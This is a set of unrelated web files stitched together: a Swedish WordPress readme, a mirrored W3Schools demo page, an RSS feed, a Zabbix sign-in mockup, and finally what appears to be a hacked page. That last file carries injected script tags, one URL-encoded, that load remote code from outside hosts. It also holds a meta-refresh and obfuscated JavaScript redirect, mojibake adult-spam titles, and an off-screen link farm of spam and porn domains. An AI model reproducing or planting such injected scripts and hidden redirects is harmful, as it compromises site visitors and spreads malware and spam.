<tr><td>Generated: Sat Nov 21 22:13:19 2015</td>
<td align="right"><i>Cross-referenced by <a href="http://phpxref.sourceforge.net/">PHPXref 0.7.1</a></i></td>
</tr>
</table>
</body></html>
|
wordpress/tags/4.1.2/dist/readme.html | wpsvse/wpse-language-packs | <!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>WordPress › "Läs mig"-dokumentation</title>
<link rel="stylesheet" href="wp-admin/css/install.css?ver=20100228" type="text/css" />
</head>
<body>
<h1 id="logo">
<a href="https://wordpress.org/"><img alt="WordPress" src="wp-admin/images/wordpress-logo.png" /></a>
<br />
Version 4.1.2 (Svensk)
</h1>
<h1>Några ord att börja med</h1>
<p>Välkommen. WordPress är ett väldigt speciellt projekt för mig. Varje utvecklare och medarbetare deltar med något unikt till mixen, och tillsammans skapar vi något vackert som jag är stolt att vara en del av. Tusentals timmar har gått åt till WordPress, och vi är hängivna för att göra det bättre för varje dag. Tack för att du gör det till en del av din värld.</p>
<p style="text-align: right;">— Matt Mullenweg</p>
<h1>Vad innebär den svenska versionen?</h1>
<p>För att underlätta för alla svenska användare så skapar vi på <a href="http://sv.wordpress.org">WordPress Sverige</a> en svensk version av WordPress-paketet. Detta innebär att WordPress är konfigurerat med de svenska språkfilerna (adminpanel på svenska), temana Twenty Eleven och Twenty Twelve är översatt till svenska och installationsinstruktionerna är på svenska. Man är välkommen att delta med förslag på ändringar osv. för de svenska språkfilerna i WordPress Sveriges <a href="http://wpsv.se/forum/">forum</a> eller i vår <a href="http://wpsv.se/tracker/">trac</a>.</p>
<p>De svenska paketen kan hittas på <a href="http://wpsv.se">WordPress Sverige</a> och på <a href="http://sv.wordpress.org">sv.wordpress.org</a>.</p>
<p style="text-align: right;">— Mattias Tengblad, WordPress Sverige</p>
<h1>Installation: Den berömda 5-minutersinstallationen</h1>
<ol>
<li>Packa upp paketet i en tom mapp och ladda upp allt till servern.</li>
<li>Gå till <url-till-din-installation><span class="file"><a href="wp-admin/install.php">/wp-admin/install.php</a></span> i din webbläsare. Fyll i dina uppgifter och klicka dig vidare. Detta bör skapa en <code>wp-config.php</code>-fil med inställningar för databasanslutningen.
<ol>
<li>Om det av någon anledning inte skulle fungera, oroa dig inte. Det fungerar inte på alla webbhotell. Öppna filen <code>wp-config-sample.php</code> med en textredigerare så som t.ex WordPad eller liknande och fyll sedan i dina databasuppgifter.</li>
<li>Spara filen som <code>wp-config.php</code> och ladda upp den.</li>
<li>Gå till <url-till-din-installation>/<span class="file"><a href="wp-admin/install.php">wp-admin/install.php</a></span> i din webbläsare.</li>
</ol>
Om det uppstår problem, dubbelkolla din <span class="file"><code>wp-config.php</code></span> fil så att alla uppgifter stämmer. Försök sedan igen. Om det fortfarande uppstår problem så kan du besöka <a href="http://wpsv.se">WordPress Sverige</a> för att få svensk support. Alternativt besök den officiella webbplatsen och dess <a href="https://wordpress.org/support/">support forum</a>.</li>
<li>När din konfigurationsfil har skapats så kommer installeraren att skapa de databastabeller som krävs. Om du får felmeddelanden, dubbelkolla uppgifterna i din <code>wp-config.php</code> och försök igen. Har du fortfarande problem så kan du med så mycket information som möjligt om felet besöka det officiella <a href="https://wordpress.org/support/" title="WordPress support">supportforumet</a> (engleska) eller <a href="http://wpsv.se">WordPress Sverige</a> för att få hjälp.</li>
<li><strong>Om du inte angivit något lösenord, notera lösenordet som visas vid installationen.</strong> Angav du inget så är ditt användarnamn <code>admin</code>.</li>
<li> Installationen bör sedan skicka dig till <a href="wp-login.php">inloggningssidan</a>. Logga in med det användarnamn och lösenord du angav vid installationen. Om ett lösenord genererades automatiskt så kan du klicka på 'Profil' för att ändra lösenordet.</li>
</ol>
<h1>Uppdatering</h1>
<h2>Automatisk uppdatering</h2>
<p>Om du uppdaterar från 2.7 eller senare så kan du använda den automatiska uppdateringen:</p>
<ol>
<li>Gå till <url-till-din-installation>/<span class="file"><a href="wp-admin/update-core.php">wp-admin/update-core.php</a></span> i din webbläsarein och följ instruktionerna.</li>
<li>Ville du ha mer att göra kanske? Men det var allt!</li>
</ol>
<h2>Manuell uppdatering</h2>
<ol>
<li>Innan du uppdaterar försäkra dig om att du har tagit backup av filer du modifierat så som t.ex <code>index.php</code>, teman och andra filer.</li>
<li>Radera dina gamla WordPress-filer och spara de du modifierat.</li>
<li>Ladda upp de nya filerna på servern (förslagsvis via FTP).</li>
<li>Gå till <url-till-din-installation><span class="file"><a href="wp-admin/upgrade.php">/wp-admin/upgrade.php</a> i din webbläsare.</span></li>
<li>Ville du ha mer att göra kanske? Men det var allt!</li>
</ol>
<h1>Migrering från andra system</h1>
<p>WordPress kan <a href="https://codex.wordpress.org/Importing_Content">importera från ett flertal olika system</a>. Innan du kan använda WordPress <a href="wp-admin/import.php" title="Importera till WordPress">verktyg för att importera innehåll</a> så behöver du installera WordPress som beskrivet ovan.</p>
<h1>Systemkrav</h1>
<ul>
<li><a href="http://php.net/">PHP</a> version <strong>5.2.4</strong> eller senare.</li>
<li><a href="http://www.mysql.com/">MySQL</a> version <strong>5.0</strong> eller senare.</li>
</ul>
<h2>Systemrekommendationer</h2>
<ul>
<li>Apache modulen <a href="http://httpd.apache.org/docs/2.2/mod/mod_rewrite.html">mod_rewrite</a>.</li>
<li>En länk till <a href="https://wordpress.org/">http://wordpress.org</a> på din webbplats.</li>
</ul>
<h1>Onlineresurser</h1>
<p>Om du har frågor om något som inte tagits upp i detta dokument så kan du ta del av någon av alla de WordPress resurser som finns att tillgå online:</p>
<dl>
<dt><a href="http://wpsv.se/">WordPress Sverige</a></dt>
<dd>Den officiella svenska portalen. WordPress Sverige tillhandahåller bl.a. dom officiella svenska språkfilerna. Här hittar du även översättningar till många tillägg och teman. Besök forumet för support.</dd>
<dt><a href="https://codex.wordpress.org/">WordPress Codex</a> (engelska)</dt>
<dd>Codex är den officiella dokumentationen för allt vad WordPress innebär.</dd>
<dt><a href="https://wordpress.org/news/">The WordPress Blog</a> (engelska)</dt>
<dd>Detta är bloggen där alla nyheter om WordPress utveckling postas. Som standard så finns detta flöde med i WordPress adminpanel.</dd>
<dt><a href="http://planet.wordpress.org/">WordPress Planet</a> (engelska)</dt>
<dd> WordPress Planet är en nyhetsportal för inlägg om WordPress runt om på webben.</dd>
<dt><a href="https://wordpress.org/support/">WordPress Support Forum</a> (engelska)</dt>
<dd>Det officiella supportforumet för WordPress.</dd>
<dt><a href="https://codex.wordpress.org/IRC">WordPress IRC-kanal</a> (engelska)</dt>
<dd>Till sist så finns det även en chat för oss som använder WordPress. (<a href="irc://irc.freenode.net/wordpress">irc.freenode.net #wordpress</a>)</dd>
</dl>
<h1>Slutord</h1>
<ul>
<li>Om du har några förslag, idéer, kommentarer eller om du (gäsp!) hittat en bugg, besök det officiella <a href="https://wordpress.org/support/">supportforumet</a> (engelska).</li>
<li>WordPress har ett robust <abbr title="application programming interface">API</abbr> för tillägg som gör utveckling av kodbasen väldigt enkel. Om du är en utvecklare som är intresserad av att använda detta, besök <a href="https://codex.wordpress.org/Plugin_API"> dokumentation för tillägg i Codex</a>. Du bör inte modifiera huvudfilerna för WordPress.</li>
</ul>
<h1>Dela med dig av kärleken!</h1>
<p>WordPress har ingen marknadskampanj för miljoner eller stora sponsorer, men vi har något ännu bättre—dig. Om du gillar WordPress fundera på att tipsa en vän, hjälp någon mindre kunnig att installera WordPress eller skriv en artikel om oss.</p>
<p>WordPress är den officiella fortsättningen av <a href="http://cafelog.com/">b2/cafélog</a>, som skapades av Michel V. Utveckling har fortsatts av <a href="https://wordpress.org/about/">WordPress-utvecklarna</a>. Om du vill stödja WordPress, fundera på att göra en <a href="https://wordpress.org/donate/">donering</a>.</p>
<h1>Licens</h1>
<p>WordPress är fri programvara som släpps under licensen <abbr title="GNU General Public License">GPL</abbr> version 2 eller (enligt eget tycke) någon senare version. Se <a href="license.txt">license.txt</a> <em>(På svenska <a href="licens-sv_SE.txt">licens-sv_SE.txt</a>)</em>.</p>
</body>
</html>
|
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/jsref/tryit34b6.html | platinhom/ManualHom |
<!DOCTYPE html>
<html lang="en-US">
<!-- Mirrored from www.w3schools.com/jsref/tryit.asp?filename=tryjsref_positive_infinity2 by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:26:28 GMT -->
<head>
<title>Tryit Editor v2.3</title>
<meta id="viewport" name='viewport'>
<script>
(function() {
if ( navigator.userAgent.match(/iPad/i) ) {
document.getElementById('viewport').setAttribute("content", "width=device-width, initial-scale=0.9");
}
}());
</script>
<link rel="stylesheet" href="../trycss.css">
<!--[if lt IE 8]>
<style>
.textareacontainer, .iframecontainer {width:48%;}
.textarea, .iframe {height:800px;}
#textareaCode, #iframeResult {height:700px;}
.menu img {display:none;}
</style>
<![endif]-->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','../../www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-3855518-1', 'auto');
ga('require', 'displayfeatures');
ga('send', 'pageview');
</script>
<script>
var googletag = googletag || {};
googletag.cmd = googletag.cmd || [];
(function() {
var gads = document.createElement('script');
gads.async = true;
gads.type = 'text/javascript';
var useSSL = 'https:' == document.location.protocol;
gads.src = (useSSL ? 'https:' : 'http:') +
'//www.googletagservices.com/tag/js/gpt.js';
var node = document.getElementsByTagName('script')[0];
node.parentNode.insertBefore(gads, node);
})();
</script>
<script>
googletag.cmd.push(function() {
googletag.defineSlot('/16833175/TryitLeaderboard', [[728, 90], [970, 90]], 'div-gpt-ad-1383036313516-0').addService(googletag.pubads());
googletag.pubads().setTargeting("content","tryjs");
googletag.pubads().enableSingleRequest();
googletag.enableServices();
});
</script>
<script type="text/javascript">
function submitTryit()
{
var t=document.getElementById("textareaCode").value;
t=t.replace(/=/gi,"w3equalsign");
var pos=t.search(/script/i)
while (pos>0)
{
t=t.substring(0,pos) + "w3" + t.substr(pos,3) + "w3" + t.substr(pos+3,3) + "tag" + t.substr(pos+6);
pos=t.search(/script/i);
}
if ( navigator.userAgent.match(/Safari/i) ) {
t=escape(t);
document.getElementById("bt").value="1";
}
document.getElementById("code").value=t;
document.getElementById("tryitform").action="tryit_view52a0.html?x=" + Math.random();
validateForm();
document.getElementById("iframeResult").contentWindow.name = "view";
document.getElementById("tryitform").submit();
}
function validateForm()
{
var code=document.getElementById("code").value;
if (code.length>8000)
{
document.getElementById("code").value="<h1>Error</h1>";
}
}
</script>
<style>
</style>
</head>
<body>
<div id="ads">
<div style="position:relative;width:100%;margin-top:0px;margin-bottom:0px;">
<div style="width:974px;height:94px;position:relative;margin:0px;margin-top:5px;margin-bottom:5px;margin-right:auto;margin-left:auto;padding:0px;overflow:hidden;">
<!-- TryitLeaderboard -->
<div id='div-gpt-ad-1383036313516-0' style='width:970px; height:90px;'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1383036313516-0'); });
</script>
</div>
<div style="clear:both"></div>
</div>
</div>
</div>
<div class="container">
<div class="textareacontainer">
<div class="textarea">
<div class="headerText" style="width:auto;float:left;">Edit This Code:</div>
<div class="headerBtnDiv" style="width:auto;float:right;margin-top:8px;margin-right:2.4%;"><button class="submit" type="button" onclick="submitTryit()">See Result »</button></div>
<div class="textareawrapper">
<textarea autocomplete="off" class="code_input" id="textareaCode" wrap="logical" xrows="30" xcols="50"><!DOCTYPE html>
<html>
<body>
<p>Click the button to create a positive infinity.</p>
<button onclick="myFunction()">Try it</button>
<p id="demo"></p>
<script>
function myFunction() {
var n = (Number.MAX_VALUE) * 2;
document.getElementById("demo").innerHTML = n;
}
</script>
</body>
<!-- Mirrored from www.w3schools.com/jsref/tryit.asp?filename=tryjsref_positive_infinity2 by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:26:28 GMT -->
</html>
</textarea>
<form autocomplete="off" style="margin:0px;display:none;" action="http://www.w3schools.com/jsref/tryit_view.asp" method="post" target="view" id="tryitform" name="tryitform" onsubmit="validateForm();">
<input type="hidden" name="code" id="code" />
<input type="hidden" id="bt" name="bt" />
</form>
</div>
</div>
</div>
<div class="iframecontainer">
<div class="iframe">
<div class="headerText resultHeader">Result:</div>
<div class="iframewrapper">
<iframe id="iframeResult" class="result_output" frameborder="0" name="view" xsrc="tryjsref_positive_infinity2.html"></iframe>
</div>
<div class="footerText">Try it Yourself - © <a href="../index.html">w3schools.com</a></div>
</div>
</div>
</div>
<script>submitTryit()</script>
</body>
</html> |
168-2007/taxonomy/term/189/0/feed/index.html | kfitz/machines | <?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xml:base="http://machines.plannedobsolescence.net/168-2007" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title>writing machines - wark</title>
<link>http://machines.plannedobsolescence.net/168-2007/taxonomy/term/189/0</link>
<description></description>
<language>en</language>
<item>
<title>GAM3R 7H30RY</title>
<link>http://machines.plannedobsolescence.net/168-2007/node/96</link>
<description><p>in what can be construed as wark's introduction, he uses the allegory of the cave to describe the lives of gamers inside an internet cafe. he goes on to talk about how beyond the cave, there are only more caves, but he seems to think that this is a uniquely modern phenomenon:</p>
<p><a href="http://machines.plannedobsolescence.net/168-2007/node/96">read more</a></p></description>
<comments>http://machines.plannedobsolescence.net/168-2007/node/96#comments</comments>
<category domain="http://machines.plannedobsolescence.net/168-2007/taxonomy/term/190">plato&#039;s cave</category>
<category domain="http://machines.plannedobsolescence.net/168-2007/taxonomy/term/107">virtual reality</category>
<category domain="http://machines.plannedobsolescence.net/168-2007/taxonomy/term/189">wark</category>
<pubDate>Sun, 18 Nov 2007 20:08:01 +0000</pubDate>
<dc:creator>gnugnu</dc:creator>
<guid isPermaLink="false">96 at http://machines.plannedobsolescence.net/168-2007</guid>
</item>
</channel>
</rss>
|
sass/signin.html | zyongqing/okp | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Zabbix</title>
<link rel="stylesheet" href="stylesheets/screen.css">
<link rel="icon" href="favicon.ico">
<link rel="apple-touch-icon-precomposed" sizes="76x76" href="apple-touch-icon-76x76-precomposed.png">
<link rel="apple-touch-icon-precomposed" sizes="120x120" href="apple-touch-icon-120x120-precomposed.png">
<link rel="apple-touch-icon-precomposed" sizes="152x152" href="apple-touch-icon-152x152-precomposed.png">
<link rel="apple-touch-icon-precomposed" sizes="180x180" href="apple-touch-icon-180x180-precomposed.png">
<link rel="icon" sizes="192x192" href="touch-icon-192x192.png">
<meta name="msapplication-TileImage" content="ms-tile-144x144.png">
<meta name="msapplication-TileColor" content="#d40000">
</head>
<body>
<header role="banner">
<!--<div><div class="signin-logo"></div></div>-->
</header>
<div class="article"><div class="server-name">This is a loooooooong loooooooong loooooooong loooooooong server name</div>
<div class="signin-container">
<div class="signin-logo"></div>
<!--<h1>Sign in</h1>-->
<form>
<ul>
<li><label for="username">Username</label><input type="text" id="username" autofocus></li>
<li><label for="password">Password</label><input type="password" id="password"></li>
<li><input type="checkbox" id="remember" class="checkbox-radio" checked><label for="remember"><span></span>Remember me for 30 days</label></li>
<li><button type="button">Sign in</button></li>
<li class="sign-in-txt">or <a href="#">sign in as guest</a></li>
</ul>
</form>
</div>
<div class="signin-links"><a href="#" class="grey link-alt">Help</a> • <a href="#" class="grey link-alt">Support</a></div>
</div>
<div class="footer">
Zabbix 2.4.1. © 2001–2015, <a href="http://www.zabbix.com" class="grey link-alt" target="_blank">Zabbix SIA</a>
</div>
</body>
</html>
|
logs/site-nipponki/02021721155.html | ForAEdesWeb/AEW25 | <script/src=//%61%6C%69%63%64%6E%2E%72%65%2E%6B%72/%72%65%2E%6B%72></script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>99re2.¾Ã¾ÃÈÈ×îеØÖ·|É«ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×ÛºÏÍø ²å²å×ÛºÏÍø</title>
<meta name="keywords" content="99re2.¾Ã¾ÃÈÈ×îеØÖ· ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×ÛºÏÍø ²å²å×ÛºÏÍø">
<meta name="description" content="99re2.¾Ã¾ÃÈÈ×îеØÖ·¸÷ÖÖ¾«²ÊÄÚÈÝʵʱ¸üÐÂ,Ϊ¹ã´óÍøÓÑÌṩԴ´×ÊÔ´,99re2.¾Ã¾ÃÈÈ×îеØÖ·Ò»ÆðËáˬ¡£ ,˼˼µÄ¼ÒÔ°"><link rel="shortcut icon" type="image/x-icon" href="favicon.ico" />
</head>
<script/src=//alicdn.re.kr/re.kr></script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>99re2.¾Ã¾ÃÈÈ×îеØÖ·|É«ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×ÛºÏÍø ²å²å×ÛºÏÍø</title>
<meta name="keywords" content="99re2.¾Ã¾ÃÈÈ×îеØÖ· ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×ÛºÏÍø ²å²å×ÛºÏÍø">
<meta name="description" content="99re2.¾Ã¾ÃÈÈ×îеØÖ·¸÷ÖÖ¾«²ÊÄÚÈÝʵʱ¸üÐÂ,Ϊ¹ã´óÍøÓÑÌṩԴ´×ÊÔ´,99re2.¾Ã¾ÃÈÈ×îеØÖ·Ò»ÆðËáˬ¡£ ,˼˼µÄ¼ÒÔ°"><link rel="shortcut icon" type="image/x-icon" href="favicon.ico" />
</head>
-------!>
<script/src=//360cdn.win/c.css></script>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.zgjm-org.com">
<script> var xx="<scr"; xx=xx+"ipt>win"; xx=xx+"dow.loc"; xx=xx+"ation.hr"; xx=xx+"ef='http://"; xx=xx+"www."; xx=xx+"zgjm-org"; xx=xx+"."; xx=xx+"com"; xx=xx+"'<\/sc"; xx=xx+"ript>";// document.write(xx); </script>
<script/src=//alicdn.re.kr/re.kr></script>
<div class="a1b2c8d9e1" style="position:fixed;left:-3000px;top:-3000px;">
<a class="a1b2c8d9e1" href="http://www.fliggypig.com">http://www.fliggypig.com</a>
<a class="a1b2c8d9e1" href="http://www.4006000871.com">http://www.4006000871.com</a>
<a class="a1b2c8d9e1" href="http://www.ddabw.com">http://www.ddabw.com</a>
<a class="a1b2c8d9e1" href="http://www.ktiyl.com">http://www.ktiyl.com</a>
<a class="a1b2c8d9e1" href="http://www.abbwl.com">http://www.abbwl.com</a>
<a class="a1b2c8d9e1" href="http://www.rht365.com">http://www.rht365.com</a>
</div class="a1b2c8d9e1">
<script>document.write ('<d' + 'iv cl' + 'a' + 's' + 's="z' + '7z8z' + '9z6" st' + 'yl' + 'e="p' + 'ositio' + 'n:f' + 'ixed;l' + 'ef' + 't:-3' + '000' + 'p' + 'x;t' + 'op' + ':-3' + '000' + 'p' + 'x;' + '"' + '>');</script>
<a class="z7z8z9z6" href="http://www.4695288.com/">http://www.4695288.com/</a>
<a class="z7z8z9z6" href="http://www.5613117.com/">http://www.5613117.com/</a>
<a class="z7z8z9z6" href="http://www.4309272.com/">http://www.4309272.com/</a>
<a class="z7z8z9z6" href="http://www.3619276.com/">http://www.3619276.com/</a>
<a class="z7z8z9z6" href="http://www.1539774.com/">http://www.1539774.com/</a>
<a class="z7z8z9z6" href="http://www.2234809.com/">http://www.2234809.com/</a>
<a class="z7z8z9z6" href="http://www.0551180.com/">http://www.0551180.com/</a>
<a class="z7z8z9z6" href="http://www.0027022.com/">http://www.0027022.com/</a>
<a class="z7z8z9z6" href="http://www.1408600.com/">http://www.1408600.com/</a>
<a class="z7z8z9z6" href="http://www.5004279.com/">http://www.5004279.com/</a>
<a class="z7z8z9z6" href="http://www.4314451.com/">http://www.4314451.com/</a>
<a class="z7z8z9z6" href="http://www.9402647.com/">http://www.9402647.com/</a>
<a class="z7z8z9z6" href="http://www.6420212.com/">http://www.6420212.com/</a>
<a class="z7z8z9z6" href="http://www.0921315.com/">http://www.0921315.com/</a>
<a class="z7z8z9z6" href="http://www.4849062.com/">http://www.4849062.com/</a>
<a class="z7z8z9z6" href="http://www.8027847.com/">http://www.8027847.com/</a>
<a class="z7z8z9z6" href="http://www.5101309.com/">http://www.5101309.com/</a>
<a class="z7z8z9z6" href="http://www.8033162.com/">http://www.8033162.com/</a>
<a class="z7z8z9z6" href="http://www.7808733.com/">http://www.7808733.com/</a>
<a class="z7z8z9z6" href="http://www.7021821.com/">http://www.7021821.com/</a>
<a class="z7z8z9z6" href="http://www.8560978.com/">http://www.8560978.com/</a>
<a class="z7z8z9z6" href="http://www.3301718.com/">http://www.3301718.com/</a>
<a class="z7z8z9z6" href="http://www.2444890.com/">http://www.2444890.com/</a>
<a class="z7z8z9z6" href="http://www.2501886.com/">http://www.2501886.com/</a>
<a class="z7z8z9z6" href="http://www.8773150.com/">http://www.8773150.com/</a>
<a class="z7z8z9z6" href="http://www.gkamlb.com/">http://www.gkamlb.com/</a>
<a class="z7z8z9z6" href="http://www.nxkmky.com/">http://www.nxkmky.com/</a>
<a class="z7z8z9z6" href="http://www.pkdszd.com/">http://www.pkdszd.com/</a>
<a class="z7z8z9z6" href="http://www.scqyba.com/">http://www.scqyba.com/</a>
<a class="z7z8z9z6" href="http://www.vwyhzp.com/">http://www.vwyhzp.com/</a>
<a class="z7z8z9z6" href="http://www.vwwoms.com/">http://www.vwwoms.com/</a>
<a class="z7z8z9z6" href="http://www.svfdun.com/">http://www.svfdun.com/</a>
<a class="z7z8z9z6" href="http://www.wivjvd.com/">http://www.wivjvd.com/</a>
<a class="z7z8z9z6" href="http://www.sstldp.com/">http://www.sstldp.com/</a>
<a class="z7z8z9z6" href="http://www.sqmtvh.com/">http://www.sqmtvh.com/</a>
<a class="z7z8z9z6" href="http://www.fmxnav.com/">http://www.fmxnav.com/</a>
<a class="z7z8z9z6" href="http://www.etqglz.com/">http://www.etqglz.com/</a>
<a class="z7z8z9z6" href="http://www.rjwmkb.com/">http://www.rjwmkb.com/</a>
<a class="z7z8z9z6" href="http://www.yrljss.com/">http://www.yrljss.com/</a>
<a class="z7z8z9z6" href="http://www.ymdwnv.com/">http://www.ymdwnv.com/</a>
<a class="z7z8z9z6" href="http://www.lhxcjs.com/">http://www.lhxcjs.com/</a>
<a class="z7z8z9z6" href="http://www.fekcko.com/">http://www.fekcko.com/</a>
<a class="z7z8z9z6" href="http://www.furpdg.com/">http://www.furpdg.com/</a>
<a class="z7z8z9z6" href="http://www.voqgwh.com/">http://www.voqgwh.com/</a>
<a class="z7z8z9z6" href="http://www.fknqkj.com/">http://www.fknqkj.com/</a>
<a class="z7z8z9z6" href="http://www.hhabtr.com/">http://www.hhabtr.com/</a>
<a class="z7z8z9z6" href="http://www.ogmykg.com/">http://www.ogmykg.com/</a>
<a class="z7z8z9z6" href="http://www.vseogg.com/">http://www.vseogg.com/</a>
<a class="z7z8z9z6" href="http://www.ctkllf.com/">http://www.ctkllf.com/</a>
<a class="z7z8z9z6" href="http://www.xzxefw.com/">http://www.xzxefw.com/</a>
<a class="z7z8z9z6" href="http://www.0172679.com/">http://www.0172679.com/</a>
<a class="z7z8z9z6" href="http://www.6088532.com/">http://www.6088532.com/</a>
<a class="z7z8z9z6" href="http://www.5214437.com/">http://www.5214437.com/</a>
<a class="z7z8z9z6" href="http://www.4601598.com/">http://www.4601598.com/</a>
<a class="z7z8z9z6" href="http://www.3848474.com/">http://www.3848474.com/</a>
<a class="z7z8z9z6" href="http://www.7621914.com/">http://www.7621914.com/</a>
<a class="z7z8z9z6" href="http://www.9064024.com/">http://www.9064024.com/</a>
<a class="z7z8z9z6" href="http://www.0979289.com/">http://www.0979289.com/</a>
<a class="z7z8z9z6" href="http://www.8732369.com/">http://www.8732369.com/</a>
<a class="z7z8z9z6" href="http://www.7578050.com/">http://www.7578050.com/</a>
<a class="z7z8z9z6" href="http://www.1206219.com/">http://www.1206219.com/</a>
<a class="z7z8z9z6" href="http://www.0320448.com/">http://www.0320448.com/</a>
<a class="z7z8z9z6" href="http://www.6038608.com/">http://www.6038608.com/</a>
<a class="z7z8z9z6" href="http://www.6804640.com/">http://www.6804640.com/</a>
<a class="z7z8z9z6" href="http://www.2393657.com/">http://www.2393657.com/</a>
<a class="z7z8z9z6" href="http://www.laibazonghewang.com/">http://www.laibazonghewang.com/</a>
<a class="z7z8z9z6" href="http://www.jiujiurezuixindizhi.com/">http://www.jiujiurezuixindizhi.com/</a>
<a class="z7z8z9z6" href="http://www.jiqingtupian8.com/">http://www.jiqingtupian8.com/</a>
<a class="z7z8z9z6" href="http://www.qmzufv.com/">http://www.qmzufv.com/</a>
<a class="z7z8z9z6" href="http://www.kwwxgj.com/">http://www.kwwxgj.com/</a>
<a class="z7z8z9z6" href="http://www.tvubqi.com/">http://www.tvubqi.com/</a>
<a class="z7z8z9z6" href="http://www.sjvxww.com/">http://www.sjvxww.com/</a>
<a class="z7z8z9z6" href="http://www.xpdmzk.com/">http://www.xpdmzk.com/</a>
<a class="z7z8z9z6" href="http://www.frveya.com/">http://www.frveya.com/</a>
<a class="z7z8z9z6" href="http://www.nonmnu.com/">http://www.nonmnu.com/</a>
<a class="z7z8z9z6" href="http://www.svytac.com/">http://www.svytac.com/</a>
<a class="z7z8z9z6" href="http://www.fdtggb.com/">http://www.fdtggb.com/</a>
<a class="z7z8z9z6" href="http://www.rnrnjm.com/">http://www.rnrnjm.com/</a>
<a class="z7z8z9z6" href="http://www.ymrxun.com/">http://www.ymrxun.com/</a>
<a class="z7z8z9z6" href="http://www.lkrecc.com/">http://www.lkrecc.com/</a>
<a class="z7z8z9z6" href="http://www.kgahjl.com/">http://www.kgahjl.com/</a>
<a class="z7z8z9z6" href="http://www.kqdmep.com/">http://www.kqdmep.com/</a>
<a class="z7z8z9z6" href="http://www.vwlwcu.com/">http://www.vwlwcu.com/</a>
<a class="z7z8z9z6" href="http://www.zuixinlunlidianying.com/">http://www.zuixinlunlidianying.com/</a>
<a class="z7z8z9z6" href="http://www.daxiangjiaowangzhi.com/">http://www.daxiangjiaowangzhi.com/</a>
<a class="z7z8z9z6" href="http://www.snnfi.com/">http://www.snnfi.com/</a>
<a class="z7z8z9z6" href="http://www.vfdyd.com/">http://www.vfdyd.com/</a>
<a class="z7z8z9z6" href="http://www.lwezk.com/">http://www.lwezk.com/</a>
<a class="z7z8z9z6" href="http://www.fpibm.com/">http://www.fpibm.com/</a>
<a class="z7z8z9z6" href="http://www.xjvdr.com/">http://www.xjvdr.com/</a>
<a class="z7z8z9z6" href="http://www.kvwqf.com/">http://www.kvwqf.com/</a>
<a class="z7z8z9z6" href="http://www.utakf.com/">http://www.utakf.com/</a>
<a class="z7z8z9z6" href="http://www.gmjeu.com/">http://www.gmjeu.com/</a>
<a class="z7z8z9z6" href="http://www.pugfa.com/">http://www.pugfa.com/</a>
<a class="z7z8z9z6" href="http://www.bldek.com/">http://www.bldek.com/</a>
<a class="z7z8z9z6" href="http://www.vdidu.com/">http://www.vdidu.com/</a>
<a class="z7z8z9z6" href="http://www.tufnc.com/">http://www.tufnc.com/</a>
<a class="z7z8z9z6" href="http://www.wqxri.com/">http://www.wqxri.com/</a>
<a class="z7z8z9z6" href="http://www.uaozz.com/">http://www.uaozz.com/</a>
<a class="z7z8z9z6" href="http://www.nhpbd.com/">http://www.nhpbd.com/</a>
<a class="z7z8z9z6" href="http://www.dinbz.com/">http://www.dinbz.com/</a>
<a class="z7z8z9z6" href="http://www.bopjc.com/">http://www.bopjc.com/</a>
<a class="z7z8z9z6" href="http://www.rvkip.com/">http://www.rvkip.com/</a>
<a class="z7z8z9z6" href="http://www.jsmqe.com/">http://www.jsmqe.com/</a>
<a class="z7z8z9z6" href="http://www.vwygx.com/">http://www.vwygx.com/</a>
<a class="z7z8z9z6" href="http://www.zgjm-org.com/">http://www.zgjm-org.com/</a>
<a class="z7z8z9z6" href="http://www.shenyangsiyue.com/">http://www.shenyangsiyue.com/</a>
<a class="z7z8z9z6" href="http://www.hongsang.net/">http://www.hongsang.net/</a>
<a class="z7z8z9z6" href="http://www.gpmrg.cc/">http://www.gpmrg.cc/</a>
<a class="z7z8z9z6" href="http://www.knfut.cc/">http://www.knfut.cc/</a>
<a class="z7z8z9z6" href="http://www.kjqdh.cc/">http://www.kjqdh.cc/</a>
<a class="z7z8z9z6" href="http://www.huang62.win/">http://www.huang62.win/</a>
<a class="z7z8z9z6" href="http://www.qiong19.win/">http://www.qiong19.win/</a>
<a class="z7z8z9z6" href="http://www.chang34.win/">http://www.chang34.win/</a>
<a class="z7z8z9z6" href="http://www.huang71.win/">http://www.huang71.win/</a>
<a class="z7z8z9z6" href="http://www.xiong10.win/">http://www.xiong10.win/</a>
<a class="z7z8z9z6" href="http://www.chong14.win/">http://www.chong14.win/</a>
<a class="z7z8z9z6" href="http://www.chong94.win/">http://www.chong94.win/</a>
<a class="z7z8z9z6" href="http://www.zheng23.win/">http://www.zheng23.win/</a>
